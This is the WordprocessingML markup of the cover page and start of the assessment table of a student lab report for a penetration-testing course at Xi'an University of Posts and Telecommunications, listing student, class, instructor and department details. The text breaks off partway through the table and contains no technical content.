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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:b/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>西安邮电大学</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:position w:val="-28"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>网络空间安全学院</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:position w:val="-28"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:position w:val="-28"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>（20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>/202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>学年第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>学期）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="1800" w:firstLineChars="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>实验名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   渗透测试技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>实践</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>学生姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>王璐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>业：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      网安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>210</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>班</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>26213035</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="1800" w:firstLineChars="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>指导教师：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      张文波  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="51"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="51"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="楷体_GB2312" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>西安邮电大学网络空间安全学院</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>渗透测试技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>课程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="156" w:afterLines="50"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>考核表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="11"/>
        <w:tblW w:w="94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0"/>
        <w:gridCol w:w="2186"/>
        <w:gridCol w:w="110"/>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1159"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>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学生姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>王璐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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班级/学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2021</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>网安</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
                <w:lang w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>2101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>26213035</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="810" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>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承担任务实验室（单位）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2186" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>空间安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>实验教学中心</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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所在部门</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>空间安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>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实施时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6889" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
